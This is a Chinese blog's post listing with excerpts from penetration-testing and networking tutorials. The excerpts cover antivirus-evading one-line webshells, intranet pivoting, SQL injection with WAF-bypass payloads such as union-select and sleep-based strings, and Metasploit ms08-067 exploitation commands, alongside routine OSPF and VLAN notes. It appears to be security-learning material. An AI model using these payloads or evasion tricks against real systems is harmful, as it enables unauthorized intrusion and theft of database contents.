- 博客(14)
- 收藏
- 关注
RSS订阅转载 各类一句话木马免杀集合
各类一句话木马免杀集合,基本过D盾与安全狗,php、asp、aspx、jsp一句话和冰蝎,我写的文章链接如下:https://www.cnblogs.com/joke-ljh/p/13794125.html
2020-10-10 17:54:49
2376
6
原创 内网渗透之通道构建
实验环境:Win7:192.168.152.136Win2008:192.168.152.135物理机:199.200.233.176在win2008阻止物理机的访问,即win2008只可以win7访问物理机可以访问win7不能访问win2008:情景1假设win已经拿到最高权限了,现在通过win7为跳板去访问内网的win20081. netsh端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为。系统原生了一些命令,可以用来做端口转发,一次只能指定一个端口进行转发,所以效率
2020-10-10 17:51:37
882
原创 SQL手工注入详解&绕过安全狗
1.常规判断注入点:and 1 like 1 ,测试回显正常and 2 like 1 ,测试回显错误and 1=1,测试回显正常and 1=2,测试回显错误1.1 可以用一些其它的方法,有时可以绕过wafand case when 1=1 then 1 else 0 end 页面返回正常and case when 1=1 then 0 else 1 end 页面返回不正常and sleep(5) 页面延迟5san
2020-10-10 17:50:45
2744
原创 web常见漏洞解析 注入 xss csrf 文件上传 文件包含 -dvwa演示
1.注入1.1 SQL注入: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。手工注入:联合注入、盲注、延...
2019-09-14 22:30:10
1549
原创 渗透-基于metasploit的内网渗透- ms10-002漏洞 - ms-15-020漏洞利用及其原理分析
渗透-基于metasploit的内网渗透- ms10-002漏洞 - ms-15-020漏洞利用及其原理分析漏洞利用及其原理分析在前面已经讲了利用metaspolit工具利用ms08-067漏洞进行的内网渗透,但是假如你要渗透的对象和你不在同一个局域网,那怎么办?你是不可能攻击到内网的主机,那我们可以想办法让它出来,让它出来主动与我们建立连接。我们可以利用ms10-002漏洞来进行渗透,它是...
2019-08-31 21:02:44
4884
3
原创 渗透- 基于metasploit的内网渗透 - ms08-067漏洞利用及其原理分析
ms08-067漏洞利用内网渗透:利用漏洞:Ms08-067使用工具metasploit前提:靶机具有ms08-067漏洞(可以用nessus扫描),在同一局域网,且具有连通性。基本命令:Use exploit/windows/smb/ms08_067_netapiSet rhost 192.168.10.2Set lhost 192.168.10.1Set lport 7777...
2019-08-31 12:01:05
2505
原创 渗透-信息收集篇-NMAP的使用及其原理
NMAP是一个免费开放的网络扫描和嗅探工具包原理:Nmap使用TCP/IP协议栈指纹准确地判断目标主机的相关信息。作用:识别活跃的主机 开放端口及相应的服务 主机的系统指纹 路由跟踪命令: nmap -sn 192.168.1.0/24 (在以前的Nmap中,-sn被称为-sP)一、存活主机扫描:查询网段中主机或者整个网段的IP存活状态1 当目标主机与源主机在同一网...
2019-08-26 12:29:25
1347
原创 模拟企业网络拓扑 双核心 单核心 高可靠性相关配置 ppp链路
1.项目介绍 这是我模拟设计的公司拓扑图,左边是我们的总公司,因为总公司终端多业务多,采用了双核心结构,右边终端数量少业务,采用了单核心结构。 首先看终端,有不同的部门,不同的业务,...
2019-08-26 12:01:13
4285
原创 OSPF个人总结
OSPF简诉(端口89)OSPF Open Shortest path first 开放式最短路径优先OSPF是IETF 开发的一种链路状态路由协议,使用基于带宽的度量值,是采用星型结构OSPF采用SPF算法计算路由,从算法上保证了无路由环路ospf支持的四种网络类型:(1)点到点网络:不用进行DR和BDR的选举,直接形成邻接关系(2)广播多路访问:以太网网络,需要进行DR和BDR的...
2019-08-20 23:14:28
713
原创 基于cisco 模拟公司网络拓扑
基本功能:1.vlan划分:将每个部门划分成一个vlan,相互隔离广播域与冲突域。2.Dhcp分配地址:在三层交换机为每个vlan配置dhcp,每个部门可动态获取自己网段的ip。3.三层交换机保证不同vlan之间的通信。4.server0可当做内网服务器,内网ip为172.16.100.1,同时作为DNS域名解析服务器。将内网服务 www.123.c om 转换为172.16.100.1 ...
2019-07-20 15:27:17
22346
47
原创 小型网络拓扑 不同vlan相互通信 pc通过dns域名解析访问服务器 华为与思科模拟实现
实验拓扑:小型网络拓扑 不同vlan相互通信 pc通过dns域名解析访问服务器 华为与思科模拟实现pc0与pc2配置命令:二层交换机://创建vlan10,与fa0/1 fa0/2 绑定:EnaConf tVlan 10Int fa0/1Switchport access vlan 10Int fa0/2Switchport access vlan 10Exit//创建...
2019-07-13 15:08:36
3391
2
原创 网络基本概念1.0
**Ip:**每一个终端的一个地址,ipv4有32位,通常有四段,每一段用一个十进制数表示。如:192.168.1.1 ipv6有128,使用冒号十六进制记法。通常有八段,每段用4个十六进制数表示。子网掩码:主要作业,划分网段。其中1表示网络号,0表示主机号。Mac地址:网卡芯片上的一个固定标识,全球唯一。有58位,通常用12个十六进制数表示。前一半是产商的标识。网卡之间通过mac相互识别,一...
2019-07-13 11:08:33
1071
原创 Access数据库手工渗透思路过程
Access数据库手工渗透思路过程1判断数据库类型一、通过页面返回的报错信息,一般情况下页面报错会显示是什么数据库类型,比如有sql可能是mysql,sqlserver。有jet可能是access;二、通过脚本判断。asp可能是access;aspx可能是sqlserver;php可能是mysql;jsp可能是oracle三、通过各个数据库特有的数据表来判断:1、mssql数据库htt...
2019-06-02 17:27:10
833
原创 一些常见的SQL注入方法(联合注入 盲注 延时注入 sqlmap的使用)
一些常见的SQL注入方法一.联合注入判断是否有注入点’ and 1=1–+猜列数'order by 1–+ 一直猜到5报错,列数为4猜库'and 1=1改为and 1=2'and 1=2 union select 1,2,3,4–+发现标题为2,内容为3,把2,3换成sql语句'and 1=2 union select 1,user(),database(),4–+’ and ...
2019-06-02 16:52:59
6871
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人